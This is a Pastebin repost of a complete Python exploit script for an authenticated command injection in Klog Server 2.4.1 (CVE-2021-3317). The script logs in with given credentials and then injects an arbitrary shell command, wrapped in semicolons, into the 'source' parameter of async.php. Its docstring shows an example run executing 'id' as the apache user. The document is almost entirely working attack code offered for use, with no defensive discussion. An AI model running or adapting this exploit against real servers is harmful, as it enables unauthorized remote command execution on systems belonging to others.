Advertisement
FlyFar

Klog Server 2.4.1 - Command Injection (Authenticated)

Feb 13th, 2024
856
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.25 KB | Cybersecurity | 0 0
  1. # Exploit Title: Klog Server 2.4.1 - Command Injection (Authenticated)
  2. # Date: 26.01.2021
  3. # Exploit Author: Metin Yunus Kandemir
  4. # Vendor Homepage: https://www.klogserver.com/
  5. # Version: 2.4.1
  6. # Description: https://docs.unsafe-inline.com/0day/klog-server-authenticated-command-injection
  7. # CVE: 2021-3317
  8.  
  9.  
  10. """
  11. Description:
  12. This script exploits a authenticated command injection vulnerability in the Klog Server <=2.4.1 .
  13. async.php file includes that "source" parameter is executed via shell_exec() function without input validation.
  14.  
  15. Example:
  16. python3 PoC.py --target 10.10.56.51 --username admin --password admin --command id
  17. [*] Status Code for login request: 302
  18. [+] Authentication was successful!
  19. [*] Exploiting...
  20.  
  21. uid=48(apache) gid=48(apache) groups=48(apache)
  22.  
  23. """
  24.  
  25. import argparse
  26. import requests
  27. import sys
  28. import urllib3
  29. from argparse import ArgumentParser, Namespace
  30.  
  31.  
  32. def main():
  33.     dsc = "Klog Server 2.4.1 - Command Injection (Authenticated)"
  34.     parser: ArgumentParser = argparse.ArgumentParser(description=dsc)
  35.     parser.add_argument("--target", help="IPv4 address of Cockpit server", type=str, required=True)
  36.     parser.add_argument("--username", help="Username", type=str, required=True)
  37.     parser.add_argument("--password", help="Password", type=str, required=True)
  38.     parser.add_argument("--command", help="Command", type=str, required=True)
  39.     args: Namespace = parser.parse_args()
  40.     if args.target:
  41.         target = args.target
  42.         if args.username:
  43.             username = args.username
  44.             if args.password:
  45.                 password = args.password
  46.                 if args.command:
  47.                     command = args.command
  48.  
  49.                 exploit(target, username, password, command)
  50.  
  51.  
  52. def exploit(target, username, password, command):
  53.     urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
  54.     s = requests.Session()
  55.     headers = {
  56.         "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
  57.          "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
  58.          "Accept-Language": "en-US,en;q=0.5",
  59.          "Accept-Encoding": "gzip, deflate",
  60.          "Content-Type": "application/x-www-form-urlencoded",
  61.          "Connection": "close",
  62.          "Upgrade-Insecure-Requests": "1",
  63.          }
  64.    
  65.     data = {"user" : username, "pswd" : password}
  66.  
  67.     login = s.post("https://" + target + "/actions/authenticate.php" , data=data, headers=headers, allow_redirects=False, verify=False)
  68.     print("[*] Status Code for login request: " + str(login.status_code))
  69.  
  70.     if login.status_code == 302:
  71.         check = s.get("https://" + target + "/index.php", allow_redirects=False, verify=False)
  72.         if check.status_code == 200:
  73.             print("[+] Authentication was successful!")
  74.         else:
  75.             print("[-] Authentication was unsuccessful!")
  76.             sys.exit(1)
  77.     else:
  78.         print("Something went wrong!")
  79.         sys.exit(1)
  80.        
  81.     print("[*] Exploiting...\n")
  82.  
  83.     executeCommand = s.get("https://" + target + "/actions/async.php?action=stream&source=;"+ command +";", allow_redirects=False, verify=False)
  84.     print(executeCommand.text)
  85.     sys.exit(0)
  86.  
  87. if __name__ == '__main__':
  88.     main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement